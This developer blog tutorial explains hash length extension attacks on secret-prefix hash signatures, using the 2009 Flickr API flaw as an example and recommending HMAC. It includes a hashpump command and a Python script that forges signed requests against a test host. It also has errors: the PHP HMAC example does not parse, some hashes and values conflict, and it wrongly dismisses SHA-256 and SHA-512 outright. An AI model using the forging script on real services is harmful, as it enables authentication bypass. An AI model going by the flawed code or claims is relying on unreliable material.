Does This Null Padding Make my Hash Look Big?
An Introduction to Hashing
As a developer, hashes and hashing functionality is one of those things we almost take for granted. The idea of a "hash" in computing has been around for a long time, at least since the early 1960s. Hashing is widely used for several purposes and is even an integral part of many systems and languages (think about hash tables in low level languages like C). Over the years there have been many hashing methods created, some with more popularity than others. It's pretty common to find a developer that knows about MD5, SHA1 or even SHA256 but what about some of the more obscure methods like GOST, BLAKE-256 or Buzhash.
Hashing method popularity has gone hand in hand with their ease of implementation and the popularity of the languages and tools that make use of them. For example, the MD5 hashing functionality has been included in the standard tooling of the PHP language since back in the PHP 4 days - that's almost twenty years ago! Other hashing methods were added around that same time as well, providing developers with other options based on their needs. In more recent releases PHP and other higher level languages include a wide range of hashing methods but some of the earliest adopted ones are still the most used.
As happens with all technology, these early hashing methods are being shunned in favor of more robust hashing methods. This is usually due to either the discovery of a flaw in the hashing method itself or that the computing power to reverse the hash has become inexpensive enough to where it no longer is sufficient protection. As a result, hashing methods like MD5, SHA1, SHA256, etc are no longer recommended and should be replaced.
What are hashes?
The basic idea of hashing is to take the data provided to the method and create a standardized output regardless of what the source data is. This usually means creating a string of characters from a certain set (usually alphanumeric) that is the same length regardless of the input. For example MD5 hashes are always 32 characters long and SHA1 hashes are 40 characters long.
One note here - there are hashing methods, like bcrypt, that result in different final hashes for the same input but that is only because the algorithm used to perform the hashing includes variable information (a seed) rather than just the input.
Hashing methods all have certain requirements so that they all behave approximately the same. There are some exceptions here and there but those are well-documented in the standards that define the method. The basic criteria are as follows:
- It must always provide the same output when provided the same input (deterministic)
- The probability of the resulting output must be the same regardless of the input
- The result should be of a fixed size (always the same length)
- Values that are considered "equivalent" should result in the same hash value
- They should be one-way and not easily reversible
This last one is the key in most places where we see hashes used to protect data. Hashes are designed to be a one way translation of the data that's provided and should not offer an easy way to reverse them. This is where brute forcing comes in. This is the act of taking a hash (or set of hashes) and trying to discover the sequence of characters that, when hashed with the same method, result in a hash that matches. Because computing power has advanced so much over the years since some of the earlier hashing methods have been introduced, it's become relatively trivial to reverse some hashes (like MD5) with even a modestly powered system.
How can hashing be used?
That being said, hashing is still a very useful part of any language and can be used for a wide range of functional pieces in your applications. In this article I'll be focusing on one of the more popular uses for hashes: ensuring message and data integrity via a hash "signature". When using a hash as a signature, it's usually necessary to include some kind of "secret" value as a part of the hash calculation in order to help prevent the hash from being tampered with or even replaced.
In PHP you might do something as simple as this:
<?php
$secret = '5up3rs3cr3t1234';
$input = 'this is the input';
echo hash('sha512', $secret.$input);
?>
In this example the $secret
value would only be known to the software itself and never to the end user. There are other use cases, such as a client needing to verify the integrity of a message they're sending to an API, where the secret could be known to the user. In that situation it should be protected just as well as if it was an application-only secret.
In this method the application can then generate hashes based on the secret and the input and re-verify them when the next request comes in. For example, say we have a URL like this:
/move_file.php?from=folder1&to=folder2&signature=e2dd854e78d8758bde1eeb3d2e640c3d0ef24611
To create this URL the application might take the values provided for from
and to
and mash them together with the secret to create the signature
value. When that page is requested, the signature can then be recreated using the same method and verified:
<?php
$secret = '5up3rs3cr3t1234';
$from = $_GET['from'];
$to = $_GET['to'];
$signature = $_GET['signature'];
$verify = hash('sha1', $secret.$from.$to);
if (hash_equals($verify, $signature) === true) {
echo 'Signature match successful!';
} else {
echo 'Invalid signature!';
}
?>
This seems like a solid plan, right? Well, unfortunately there's an issue that was discovered in several of the hashing method (those based on the Merkle–Damgård construction) such as MD5, SHA1 and SHA256 where the attacker didn't need to know the secret and could inject their own content for the hash creation. This data could even override the data already included, basically allowing the attacker full control to bypass the signature validation. This kind of attack is called a hash length extension attack because of how the exploit happens.
What is a "hash length extension" attack?
To understand what a hash length extension attack is you need to know a bit of background about how hashes are made. Since the vulnerability happens with hashing methods related to the Merkle–Damgård construction we'll focus on those methods. When the input is provided to the hashing functionality it needs to do some work to standardize things before converting it into the resulting output. As the types of input vary widely, extra padding is added to ensure that the data fits into the size requirements for the hashing method.
This padding usually comes in the form of null bytes (0x00
in hex notation) and is added internally during the hash functionality's processing. The padding starts with a 0x80
hex byte and then is padded out, leaving room for an 8 byte field at the end of the data for noting length. You as a developer don't have to think about this processing, it just happens and you're provided the resulting hash of this combined data. The reason it's important to know, however, is that this knowledge is required to understand the attack.
Much like you'd expect from an attack with "length extension" in its name, the issue has to do with the number of characters involved in the processing. Since we now know that our hashes are usually padded out with null bytes and no checking is done on the input as a part of the hashing, it's possible to inject additional null bytes into the content and extend the length of the data being hashed. Because of how the hashing methods work, this can be used to append arbitrary content to the data behind used behind the scenes for the hashing. The hash processing sees this extra data and uses it as a part of the overall data, potentially even overwriting parts of the current data. This means an attacker doesn't even need to know the secret to be able to coerce the resulting hash into something they need.
The Attack
Now we know the concepts, lets look at an actual attack to help it make a bit more sense. While you can potentially perform the computations manually there are tools out there that help perform these kinds of attacks (for testing only, naturally) and make it easier. One such tool is Hashpump, a simple command line tool that you give the data, a known signature that was generated with an unknown secret and whatever additional information you want appended to the data (the injected value).
Here's an example of it in use with some of our data from above:
/usr/local/bin/hashpump -s e2dd854e78d8758bde1eeb3d2e640c3d0ef24611 \
--data 'from=folder1&to=folder2' \
-a 'a' \
-k 14
In this example we've used a key length of 14 but you'll probably need to do a bit of testing if you're using this against a system with an unknown secret. The key length and the secret length have to correctly correlate in order for the attack to be successful.
In the command above we provide the previous data (including the from
and to
values), the previous signature and the data to append: a new value for to
of folder3
. We'll then be provided with two values: the new signature hash to use on the request and the request parameter string including the null bytes and new value to append:
fb63dd7fb1ae87fd5d4a69f7f76b39f5db4ed3cc
from=folder1&to=folder2\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01(&to=folder3
Since hashpump
doesn't automatically go through the key lengths for you (other tools include that functionality) so you'll need to have some kind of wrapper around it to run through various lengths and try each. For my testing I wrote a quick Python script that did the hard work for me of calling hashpump
and making the URL requests to determine the success or failure of the attempt. Here's that code:
import requests
from subprocess import check_output
import re
originalSig = 'e2dd854e78d8758bde1eeb3d2e640c3d0ef24611'
cmd = "/usr/local/bin/hashpump -s '" + originalSig + "' --data 'from=folder1&to=folder2' -a 'a' -k "
for x in range(1, 10):
# Append the key length to the command and get the output from execution
ncmd = cmd + str(x)
out = check_output(ncmd, shell=True).split("\n")
newParams = out[1].strip()
newSig = out[0].strip()
# URL encode the padding
m = re.search(r"folder2(.+?)a", newParams)
items = m.group(1).split('\\')
for item in items:
newParams = newParams.replace('\\x'+item, '%'+item)
viewUrl = 'http://test.localhost/input.php?' + newParams + '&signature=' +newSig
r = requests.get(viewUrl)
if r.text.strip() == 'Signature match successful!':
print 'New URL params: ' + newParams
print 'New full URL: ' + viewUrl
print 'Key length: ' + str(x) + ' -> ' + r.text.strip()
In this code I'm calling the hashpump
command line tool with various key lengths with a starting range of 1...10
. The output from the command is pulled in, the padding is URL encoded and the Python requests library is used to make the request to the new URL. The range is there because, as an outsider, we wouldn't know what the secret value is so we need to run several tests to guess. Hopefully the secret is nice and short like ours but you never know. You might have to make the range quite a bit higher to find the sweet spot.
In the case of our secret - 5up3rs3cr3t1234
- we end up getting lucky with a key value of "6". Here's the output we get:
New URL params: from=folder1&to=folder2%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%88a
New full URL: http://test.localhost/input.php?from=folder1&to=folder2%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%88a&signature=de07e769759795a082765b2b8c813015e95d45f6
Key length: 6 -> Signature match successful!
So what happened here? Well, when we make the request to that URL with the modified version of the value of to
with all of the padding and the right length, the hash extension attack kicks in. As a result the null padding is appended to the current secret, to and from values and a new hash is created - an exact match for the one we provided as the signature: e07e769759795a082765b2b8c813015e95d45f6
. Normally the matching hash for a to
value of folder2
and a from
value of folder1
would be e2dd854e78d8758bde1eeb3d2e640c3d0ef24611
.
How is this useful?
Now that we understand how the attack itself works lets talk some about how it could actually be abused. Up until now I've presented you with a pretty basic example but there is a case from the past (back in 2009) where this vulnerability existed in a well-used, production service. Flickr is one of the most widely used photo sharing websites out there. While it may not be quite as popular as it once was, it still has plenty of active users and hosts a large amount of photos. One of the services it offers is an API that makes it easier for developers to integrate with the platform. Back in 2009 their API was relatively new to their service but they'd put in some good authentication and authorization mechanisms to protect it. Most of the operations for the API required the user to be logged in. These logged in requests included a signature value as a part of the request to help prove the user was who they say they are.
You can see where this is going, right? Well, this signature was a md5
hashed value of the secret and the current values from the URL. This should sound pretty familiar to our previous examples. There was a bit more involved than just the hash length extension but it definitely played a major role. With the md5
hashing method being used and the ability of the user to be able to manipulate the values used in the hash directly, it's no shock that this bypass was discovered. Two researchers, Thai Duong and Juliano Rizzo, released a report of their findings and how the bug could be exploited (after they talked with Flickr/Yahoo first, naturally).
There was another issue coupled with the hash length extension that made it even worse. Because of how they were using the URL values (removing the delimiters) it was possible to override a URL value with one of your own. The hash length extension attack then allowed you to trick the server into generating the hash you want and giving it the signature it expects.
How can I be protected?
Well, there's one quick and easy way to protect yourself: don't use any of the hashing methods that are vulnerable to this kind of attack. These are:
- MD4
- MD5
- RIPEMD-160
- SHA-0
- SHA-1
- SHA-256
- SHA-512
- WHIRLPOOL
One of the easiest paths to migrate to is an HMAC hash. This hashing method uses a different process than those previously mentioned to compute the resulting hash. It was designed to allow for the verification of message integrity and and authenticity of a message (as a signature). While the same hashing types mentioned before can be used along with it, the process used to genrate the hash is no longer vulnerable to this padding attack. If you're using PHP, there's already a built-in function to help make using HMAC hashes easy, hash_hmac:
<?php
$secret = '5up3rs3cr3t1234';
$from = $_GET['from'];
$to = $_GET['to'];
$signature = $_GET['signature'];
$verify = hash_hmac('sha1', $from,.$to, $secret);
if (hash_equals($verify, $signature) === true) {
echo 'Signature match successful!';
} else {
echo 'Invalid signature!';
}
?>
Now, the easy answer for the security side is "don't use them" but sometimes that's just not a viable option. Here's a few recommendations on how to use them safely if at all:
- Don't use these methods when user input is involved. You shouldn't be hashing anything of significance with these methods anymore anyway, especially not passwords or other sensitive data. When users have input on how the hash is generated, this attack is possible.
- Only use these hashing methods for use-once, throwaway kinds of things like CSRF tokens based on randomly generated values.
- If you are already using them and can't immediately replace them, consider doing a "slow roll upgrade" to a more robust hashing method.
One last recommendation that's not specifically related to this attack but is a good practice when it comes to comparing hashes: always use a timing-safe comparison. If you're in PHP that means using hash_equals rather than the double- or triple-equals (==
or ===
). This prevents an attacker from gaining any additional information about valid versus invalid hashes based on timing on the request.
For more information about hashing, hash length extension vulnerabilities and an interesting write-up of when Stripe included it in one of their Capture the Flag contests check out the Resources section below.